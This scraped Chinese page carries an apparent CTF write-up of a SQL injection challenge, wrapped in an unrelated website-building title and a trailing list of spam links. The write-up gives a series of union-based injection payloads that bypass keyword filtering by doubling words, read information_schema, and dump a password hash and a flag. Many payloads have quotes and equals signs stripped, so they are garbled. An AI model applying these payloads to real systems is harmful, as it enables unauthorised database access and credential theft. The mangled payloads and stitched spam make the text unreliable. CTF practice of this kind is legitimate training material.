当前位置: 首页 > news >正文

备案 增加网站鄂伦春网站建设

备案 增加网站,鄂伦春网站建设,网站维护一般多少钱,ppt链接网站怎么做打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11 页面报错 1 or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错#xff0c;根据报错显示页面过滤掉了or和by 那我们…打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11  页面报错 1  or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错根据报错显示页面过滤掉了or和by 那我们试试 -1 union select 1,2,3,4 # 根据报错显示页面过滤了union和select 那我们就可以尝试双写绕过 1 ununionion seselectlect 1 # 报错显示有不同的列名 那就一个一个试吧 1 ununionion seselectlect 1,2,3# 页面正常 并且这里显示报错显示位为2,3 1 ununionion seselectlect 1,2,3,4# 页面报错 说明列名字段数为3 爆用户名和数据库名 -1’ ununionion seselectlect 1,user(),database()  # 这样我们就可以知道数据库用户名为rootlocalhost数据库名为geek -1 ununionion seselectlect 1,version(),version_compile_os # 这样我们就知道操作系统version_compile_os为Linux数据库版本为10.3.18-MariaDB 总结一下就是 操作系统version_compile_osLinux 数据库版本version():  10.3.18-MariaDB 数据库用户名user():  rootlocalhost 数据库名database():  geek 接下来我们查询geek数据库下的表名信息 -1 ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcemageek # 我们发现informmationwhere都被过滤掉了 那我们对其进行双写 -1 uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schemageek # 忘记页面是过滤or了 重新换个姿势 -1 ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schemageek # 说明表名有b4bsql,geekuser 爆破列名 -1 ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_namegeekuser # 爆破数据 -1 uunionnion seselectlect 1,2,password frfromom geekuser  # 又忘记过滤or了 -1 uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  # 这下爆出了password为2ac772d9987993a29b85958839d4e468 用户名为admin id为1 尝试登录了一下用户名和密码发现下面没有flag 那我们爆破b4bsql表下的列名 -1 ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_nameb4bsql # 发现下面也有三个列名 -1 uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql # 查看页面源代码得到flag 知识点 常见的sql注入绕过方式SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户 information_schema.schemata 获取所有数据库信息 表包含以下列 catalog_name目录名称schema_name 模式数据库的名称。default_character_set_name 数据库编码。default_collation_name 数据库排序规则
http://www.hkea.cn/news/14395776/

相关文章:

  • 重庆网站设计案例中信建设有限责任公司世界排名
  • 姓名域名网站领取免费空间
  • 重庆大足网站建设wordpress怎么卖模板
  • 网站服务器维护方案网站的建设部署与发布
  • 北京做网站网站建设服务标准
  • 专门做app的原型网站百度精准营销获客平台
  • 制作网站专业公司哪家好装饰设计公司wordpress企业主题
  • 智能网站平台互联网技术的概念
  • 做图的软件网站简搜网站提交
  • 网站网站怎么建设摄影网站模版
  • 东昌府区建设局网站郑州网页设计制作公司
  • ps可以做网站动态图网站备案需要材料
  • 房地产网站建设报价网站上点击图片局部放大如何做
  • 千秋网络是家西安做网站的公司个人做论坛网站怎么做
  • 360兼容模式网站错位诺诚建设工程有限公司网站
  • 做透明头像的网站html加入wordpress
  • 网站建设管理经验做法宜春静态管理
  • 医院网站内链优化做网站推广每天加班
  • 腾讯云做网站教程企业网站宽度给多少
  • 公司网站建设北京求个没封的a站yw1129cm
  • 广州网站建设十年乐云seo大宗商品交易平台
  • 营销型类型网站有哪些类型app软件开发的费用设计
  • 学院网站制度建设网站建设业务
  • 化妆品网站推广策划书重庆手机网站推广方法
  • 免费平面设计模板网站有哪些设计好看的企业官网
  • j建网站wordpress表
  • 江阴做公司网站有哪些中企动力建设的网站如何修改
  • 临沂培训学校网站建设做餐饮网站价格
  • php中网站不同模板后台逻辑代码怎么管理wordpress错误代码500
  • 环境设计案例网站深圳网站关键词